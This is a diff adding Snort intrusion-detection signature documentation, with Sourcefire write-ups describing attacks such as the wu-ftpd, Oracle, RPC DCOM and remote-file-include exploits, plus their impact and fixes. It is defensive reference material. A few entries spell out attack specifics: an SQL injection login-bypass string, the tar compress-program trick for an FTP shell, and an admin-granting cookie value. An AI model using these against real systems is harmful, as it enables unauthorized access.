+Sid:
+1864
+
+--
+Summary:
+This event is generated when an attempt is made to enter the "SITE 
+NEWER" command on an FTP server.
+
+--
+Impact:
+Denial of Service. Possible execution of arbitrary code is possible.
+
+--
+Detailed Information:
+When issued the "SITE NEWER" command, some versions of wu-ftpd can 
+consume excessive ammounts of memory whichthen can effectively act as a 
+denial of service to the entire system. If a user can create files on 
+the system, it may be possible to execute code as the user running the 
+ftpd daemon, typically root.
+
+--
+Affected Systems:
+	wu-ftpd versions prior to and including 2.4.2.
+
+--
+Attack Scenarios:
+An attacker might be trying to DoS the system, and it could lead to 
+arbitrary code execution with root privileges.
+
+--
+Ease of Attack:
+Medium
+
+--
+False Positives:
+This can lead to false positives if the ftp service is not wu-ftpd or if
+wu-ftpd is greater than version 2.4.2
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade the wu-ftpd service
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2645.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2645
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "instantiate_offline" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "refresh_template_name"
+variable to cause the overflow. The result could permit the attacker
+to gain escalated privileges and run code of their choosing. This
+attack requires an attacker to logon to the database with a valid
+username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck630.html
+
+--
--- /dev/null
+++ b/doc/signatures/1960.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+1960
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) nfsd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port nfsd is using.  Attackers can also learn what versions of the nfsd protocol are accepted by nfsd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as nfsd run.  The nfsd RPC service starts the Network File System (NFS) server daemon that handles file system requests from clients. Once a client mounts an NFS file system, the nfsd daemon handles access to the mount point and associated directories.  Several vulnerabilities are associated with nfsd.
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where nfsd runs.  This may be a precursor to accessing nfsd.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access nfsd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for nfsd, not probes of the nfsd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the nfsd service itself. An attacker may attempt to go directly to the nfsd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/903.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+903
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2142.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid: 2142
+
+
+--
+Summary:
+This event is generated when an attempt is made to access the php application shoutbox. 
+
+--
+Impact:
+Information gathering possible execution of arbitrary code and remote access to the host.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access the php application shoutbox. Shoutbox contains a flaw that can allow an attacker to perform a directory traversal.
+
+The attacker may be trying to gain information on the php implementation on the host, this may be the prelude to an attack against that host using that information.
+
+--
+Affected Systems:
+Any host using php.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the host. The attacker might then gain administrator access to the host or execute arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the php implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2063.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2063
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Demarc PureSecure.
+
+--
+Impact:
+Administrative control of the Demarc PureSecure IDS, Information 
+disclosure
+
+--
+Detailed Information:
+Demarc PureSecure is a Snort based Intrusion Detection System. A 
+vulnerability exists where an attacker can bypass login authorization 
+using SQL injection.
+
+Versions of Demarc PureSecure up to 1.6 suffer from poor authentication 
+methods, where input in the form of specially constructed SQL queries 
+can allow an attacker to gain administrative access to the IDS.
+
+--
+Affected Systems:
+Demarc PureSecure prior to version 1.6
+
+--
+Attack Scenarios:
+The attacker needs to send specially constructed SQL queries directly to
+the Demarc login page.
+
+For example, the attacker might send his own variables for the session 
+id or session key in a query s_key=' OR current_session_id LIKE '%' the 
+attacker would of course, need to convert spaces to their encoded 
+equivalents and escape special characters.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/4520
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0539
+
+--
--- /dev/null
+++ b/doc/signatures/533.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+533
+
+--
+Summary:
+This event is generated when an attempt is made to access the C$ default
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
--- /dev/null
+++ b/doc/signatures/3419.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3419
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/680.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1050.txt
@@ -0,0 +1,53 @@
+Rule:
+--
+Sid:
+1050
+--
+Summary:
+This event is generated when a request is made to a webserver using the 
+the command 'GETPROPERTIES'. This may be an indication that a buffer 
+overflow attack may be in process.
+--
+Impact:
+If successful, this attack will allow attackers to run code of their 
+choosing on the victim server.
+--
+Detailed Information:
+The web publishing feature in iPlanet Web Server 4.1 is vulnerable to a 
+buffer overflow.
+--
+Affected Systems:
+iPlanet Web Server 4.1 up to Service Pack 8
+--
+Attack Scenarios:
+An attacker can spawn a remote shell on the server and execute any 
+command they desire.
+--
+Ease of Attack:
+Difficult.  Exploit code does not appear to exist as of June 2003, so an
+attacker would need to write the code themselves.
+--
+False Positives:
+Legimate uses of web publishing.
+--
+False Negatives:
+This vulnerability can be exploited using any number of web publishing 
+commands, however this rule only generates an event on one specific 
+command (GETPROPERTIES).
+--
+Corrective Action:
+Disable web publishing or upgrade your web server software.
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen <kevin.peuhkurinen@hepcoe.com>
+
+-- 
+Additional References:
+
+NTBugtraq Archive:
+http://archives.neohapsis.com/archives/ntbugtraq/2001-q2/0035.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000340.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000340
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "V-Webmail" application running on a webserver. Access to the file "pop3.php" using a remote file being passed as the "CONFIG[pear_dir]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "CONFIG[pear_dir]" parameter in the "pop3.php" script used by the "V-Webmail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using V-Webmail
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2474.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2474
+
+--
+Summary:
+This event is generated when an attempt is made to access the ADMIN$
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
--- /dev/null
+++ b/doc/signatures/362.txt
@@ -0,0 +1,75 @@
+Rule: 
+
+--
+Sid: 362
+
+-- 
+
+Summary: 
+This event is generated when an attempt to abuse an FTP servers functionality and configuration weaknesses is attempted.
+
+-- 
+Impact:
+Serious. The attacker may have the ability to execute commands remotely within an FTP session.
+
+-- 
+Detailed Information: 
+This event is generated when an attempt to abuse the built-in archive decompression functionality of the FTP server is attempted.
+
+Some FTP servers allow the user to compress/archive files on the fly whilst they are being uploaded or downloaded. For example, the user may be able to "tar" and download an entire directory in one command simply by requesting the "directory_name.tar". Additionally, the user may be able to specify the command the "tar" archiver will use for compression (normally, "gzip", "bzip2", etc) and have an FTP server erroneously accept this command. 
+
+If this command is a shell, an interactive session will be started.  The string " --use-compress-program" is an indicator that such a parameter is being given to "tar" utility.  The attack requires an established FTP session.
+
+--
+
+Attack Scenarios: 
+An FTP-only user with no shell access can connect to a server and execute a "/bin/bash" shell via this exploit. This will present the attacker with interactive access to a system.
+
+-- 
+
+Ease of Attack: 
+Simple. The attack requires an access via FTP to the target server. In the case of an anonymous FTP connection, the attack will only permit execution of software from within the chrooted anonymous FTP home. 
+
+If the session is that of a regular FTP user, any binary or executable file can be executed. No special exploit software is required.
+
+-- 
+
+False Positives: 
+Highly unlikely, but the legitimate use of this functionality might trigger a false alarm
+
+-- 
+
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Upgrade the FTP server software to a non-vulnerable version
+
+Restrict access to the FTP server to trusted users/IP addresses, 
+
+Disallow automatic file archival
+
+Disable FTP server and use secure shell (SSH) for transferring files.
+
+--
+Contributors: 
+Original rule writer Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS134
+
+Bugtraq:
+http://online.securityfocus.com/bid/2240
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0202
+
+--
--- /dev/null
+++ b/doc/signatures/111-11.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+111-11
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+This may indicate scanning activity.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected network traffic that may indicate
+a scan is in progress. In this case, indications are that a Vecna scan
+is being used to determine the operating system of the target host.
+
+A sequence of packets has been observed that use a combination of URG,
+PUSH and FIN flags being set in a certain order in the datastream.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker may utilize scanning techniques to determine possible points
+of exploitation against a host.
+
+-- 
+Ease of Attack: 
+Simple. Many scanning tools exist.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2136.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2136
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a weakness in the Philboard ASP application. 
+
+--
+Impact:
+Possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a weakness in the Philboard ASP application. By setting a cookie value to "True" administration rights are granted to that user. The user would then gain control of the application and have access to all administration functions.
+
+This rule generates an event if the attacker makes a request for the administration page with the cookie "philboard_Admin" value set to true from a source external to the protected network.
+
+
+--
+Affected Systems:
+Any host using Philboard.
+
+--
+Attack Scenarios:
+An attacker can gain administrator access to the application by making a simple web request.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+This event may be generated by an administrator accessing the administration page from an external source.
+
+The event will also be generated if Nessus is used to scan the host for this vulnerability.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Deny access to this page from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1303.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1303
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000588.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000588
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "db_export.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "db_export.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3259.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3259
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1150.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1150
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2289.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2289
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2105.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+2105
+
+--
+Summary:
+This event is generated when a remote user uses the IMAP AUTHENTICATE
+command to send a suspiciously long string to port 143 on an internal
+server. This may indicate an attempt to exploit a buffer overflow
+vulnerability in the IMAP AUTHENTICATE command. This vulnerability may
+affect other IMAP implementations.
+
+--
+Impact:
+Serious. Possible remote execution of arbitrary code, which may lead to
+a remote root compromise.
+
+--
+Detailed Information:
+When a large amount of data is sent to a vulnerable IMAP server in the
+AUTHENTICATE command, a buffer overflow condition may occur. This can
+allow the attacker to execute arbitrary code, which may allow the
+attacker to gain root access to the compromised server.
+
+--
+Affected Systems:
+	University of Washington imapd version 10.234 and earlier.
+
+--
+Attack Scenarios:
+An attacker can send a sufficiently long AUTHENTICATE command to the
+IMAP server, creating a buffer overflow condition. This can then allow
+the attacker to gain root access to the compromised server.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate patches for your operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/130
+
+CVE
+http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-1999-0005 
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11073
+
+--
--- /dev/null
+++ b/doc/signatures/354.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+
+Rule:
+--
+Sid:
+354
+
+--
+
+Summary:
+This event is generated when an attempt is made to login anonymously 
+into an ftp server using a suspicious password (-iss@iss)
+
+--
+
+Impact:
+Possible unauthorized access. Information gathering.
+
+--
+
+Detailed Information:
+ISS Scanner is a security scanner which checks for common 
+vulnerabilities. When it detects an open ftp server, it tries to log in 
